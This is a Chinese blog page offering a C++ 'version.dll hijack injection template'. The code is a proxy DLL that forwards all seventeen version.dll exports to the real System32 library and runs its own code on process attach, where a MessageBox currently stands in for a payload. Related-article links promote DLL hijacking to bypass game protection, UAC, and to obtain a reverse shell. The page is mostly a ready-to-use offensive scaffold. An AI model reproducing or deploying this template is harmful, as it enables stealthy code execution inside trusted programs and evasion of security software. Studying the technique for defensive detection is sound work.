version.dll劫持注入模版

// dllmain.cpp : 定义 DLL 应用程序的入口点。
#include "stdafx.h"BOOL APIENTRY DllMain( HMODULE hModule,DWORD  ul_reason_for_call,LPVOID lpReserved)
{switch (ul_reason_for_call){case DLL_PROCESS_ATTACH:{// 绝对路径加载VERSION.dll::LoadLibrary("C:\\Windows\\System32\\VERSION.dll");::MessageBox(NULL, "调用函数方法", "From DLL Hijack", MB_OK | MB_ICONWARNING);break;}case DLL_THREAD_ATTACH:{break;}case DLL_THREAD_DETACH:{// 卸载VERSION.dllHMODULE hDll = ::GetModuleHandle("C:\\Windows\\System32\\VERSION.dll");if (hDll){::FreeLibrary(hDll);}break;}case DLL_PROCESS_DETACH:{break;}break;}return TRUE;
}// 导出
#pragma comment(linker, "/EXPORT:GetFileVersionInfoA=_DG_GetFileVersionInfoA,@1")
#pragma comment(linker, "/EXPORT:GetFileVersionInfoByHandle=_DG_GetFileVersionInfoByHandle,@2")
#pragma comment(linker, "/EXPORT:GetFileVersionInfoExA=_DG_GetFileVersionInfoExA,@3")
#pragma comment(linker, "/EXPORT:GetFileVersionInfoExW=_DG_GetFileVersionInfoExW,@4")
#pragma comment(linker, "/EXPORT:GetFileVersionInfoSizeA=_DG_GetFileVersionInfoSizeA,@5")
#pragma comment(linker, "/EXPORT:GetFileVersionInfoSizeExA=_DG_GetFileVersionInfoSizeExA,@6")
#pragma comment(linker, "/EXPORT:GetFileVersionInfoSizeExW=_DG_GetFileVersionInfoSizeExW,@7")
#pragma comment(linker, "/EXPORT:GetFileVersionInfoSizeW=_DG_GetFileVersionInfoSizeW,@8")
#pragma comment(linker, "/EXPORT:GetFileVersionInfoW=_DG_GetFileVersionInfoW,@9")
#pragma comment(linker, "/EXPORT:VerFindFileA=_DG_VerFindFileA,@10")
#pragma comment(linker, "/EXPORT:VerFindFileW=_DG_VerFindFileW,@11")
#pragma comment(linker, "/EXPORT:VerInstallFileA=_DG_VerInstallFileA,@12")
#pragma comment(linker, "/EXPORT:VerInstallFileW=_DG_VerInstallFileW,@13")
#pragma comment(linker, "/EXPORT:VerLanguageNameA=_DG_VerLanguageNameA,@14")
#pragma comment(linker, "/EXPORT:VerLanguageNameW=_DG_VerLanguageNameW,@15")
#pragma comment(linker, "/EXPORT:VerQueryValueA=_DG_VerQueryValueA,@16")
#pragma comment(linker, "/EXPORT:VerQueryValueW=_DG_VerQueryValueW,@17")// 获取函数地址
PVOID GetFunctionAddress(char *pszFunctionName)
{PVOID pAddr = NULL;HMODULE hDll = NULL;char szDllPath[MAX_PATH] = "C:\\Windows\\System32\\VERSION.dll";hDll = ::LoadLibrary(szDllPath);if (NULL == hDll){return NULL;}pAddr = ::GetProcAddress(hDll, pszFunctionName);::FreeLibrary(hDll);return pAddr;
}// 函数
extern "C" void __declspec(naked) DG_GetFileVersionInfoA()
{GetFunctionAddress("GetFileVersionInfoA");__asm jmp eax
}extern "C" void __declspec(naked) DG_GetFileVersionInfoByHandle()
{GetFunctionAddress("GetFileVersionInfoByHandle");__asm jmp eax
}extern "C" void __declspec(naked) DG_GetFileVersionInfoExA()
{GetFunctionAddress("GetFileVersionInfoExA");__asm jmp eax
}extern "C" void __declspec(naked) DG_GetFileVersionInfoExW()
{GetFunctionAddress("GetFileVersionInfoExW");__asm jmp eax
}extern "C" void __declspec(naked) DG_GetFileVersionInfoSizeA()
{GetFunctionAddress("GetFileVersionInfoSizeA");__asm jmp eax
}extern "C" void __declspec(naked) DG_GetFileVersionInfoSizeExA()
{GetFunctionAddress("GetFileVersionInfoSizeExA");__asm jmp eax
}extern "C" void __declspec(naked) DG_GetFileVersionInfoSizeExW()
{GetFunctionAddress("GetFileVersionInfoSizeExW");__asm jmp eax
}extern "C" void __declspec(naked) DG_GetFileVersionInfoSizeW()
{GetFunctionAddress("GetFileVersionInfoSizeW");__asm jmp eax
}extern "C" void __declspec(naked) DG_GetFileVersionInfoW()
{GetFunctionAddress("GetFileVersionInfoW");__asm jmp eax
}extern "C" void __declspec(naked) DG_VerFindFileA()
{GetFunctionAddress("VerFindFileA");__asm jmp eax
}extern "C" void __declspec(naked) DG_VerFindFileW()
{GetFunctionAddress("VerFindFileW");__asm jmp eax
}extern "C" void __declspec(naked) DG_VerInstallFileA()
{GetFunctionAddress("VerInstallFileA");__asm jmp eax
}extern "C" void __declspec(naked) DG_VerInstallFileW()
{GetFunctionAddress("VerInstallFileW");__asm jmp eax
}extern "C" void __declspec(naked) DG_VerLanguageNameA()
{GetFunctionAddress("VerLanguageNameA");__asm jmp eax
}extern "C" void __declspec(naked) DG_VerLanguageNameW()
{GetFunctionAddress("VerLanguageNameW");__asm jmp eax
}extern "C" void __declspec(naked) DG_VerQueryValueA()
{GetFunctionAddress("VerQueryValueA");__asm jmp eax
}extern "C" void __declspec(naked) DG_VerQueryValueW()
{GetFunctionAddress("VerQueryValueW");__asm jmp eax
}

version.dll劫持注入模版相关推荐

用户层注入：(3)DLL劫持注入
目录基本概念注入原理函数转发函数调用局限性基本概念 Windows的应用程序在加载进程所需的动态库时,会根据导入表一一加载.但是,我们的导入表中只保存有动态库的名称,系统如何知道这个动 ...
易语言lsp劫持_[原创]不用导出任何函数的DLL劫持注入,完美!
. 最近在写SOCKS5代理,用的是LSP.代理成功了,但是因为LSP模块没办法隐藏,各种三方模块啊删除PE头,强制删除文件,游戏都会闪退想来想去,就想到这个法子,HOOK LdrLoadDll返 ...
DLL劫持注入技术分析、过各种游戏保护！让你做你爱做的事情！
劫持DLL就是要制作一个"假"的DLL,但是功能又不能失真. 可执行文件在调用某函数时,要加载该函数所在的DLL.如果我们伪造一个DLL,让它包含所有被劫持DLL的导出函数.可执行 ...
Dll注入技术之劫持注入
Dll注入技术之劫持注入测试环境系统:Windows 7 32bit 工具:FileCleaner2.0 和 lpk.dll 主要思路利用Window可以先加载当前目录下的dll特性,仿造系统的 ...
dll注入工具_bypassUAC amp;amp; DLL劫持
0x11 UAC简介用户帐户控制(User Account Control,简写作UAC)是微软公司在其Windows Vista及更高版本操作系统中采用的一种控制机制.其原理是通知用户是否对应用程 ...
后渗透篇：劫持技术（lpk.dll劫持游戏注入【Win7 实例】）
当你的才华还撑不起你的野心时那你就应该静下心来学习 lpk.dll劫持游戏注入由于输入表中只包含DLL名而没有它的路径名,因此加载程序必须在磁盘上搜索 DLL文件.首先会尝试从当前程序所在的目 ...
Win7下实现 lpk.dll劫持游戏注入
由于输入表中只包含DLL名而没有它的路径名,因此加载程序必须在磁盘上搜索DLL文件.首先会尝试从当前程序所在的目录加载DLL,如果没找到,则在Windows系统目录中查找,最后是在环境变量中列出的各个 ...
Windows 下的 7 种 DLL 劫持技术
本文讲的是Windows 下的 7 种 DLL 劫持技术,在本文中,我将列出半打可以在Windows运行用户模式的进程中使用DLL注入技术.也许可能会有更多类似的技术,但我正在和你分享的是我所拥有的第 ...
win7 dll怎么在xp运行_微信DLL劫持反弹shell复现
网安引领时代,弥天点亮未来写在前面: 最近刚好在做PPT的dll劫持测试,现在就随便拿一个程序来练练手.增加一下熟练度.本测试纯属学习测试过程,不可用于非法操作!!! 一.测试环境工具下载地址: ...

version.dll劫持注入模版

version.dll劫持注入模版相关推荐

最新文章

热门文章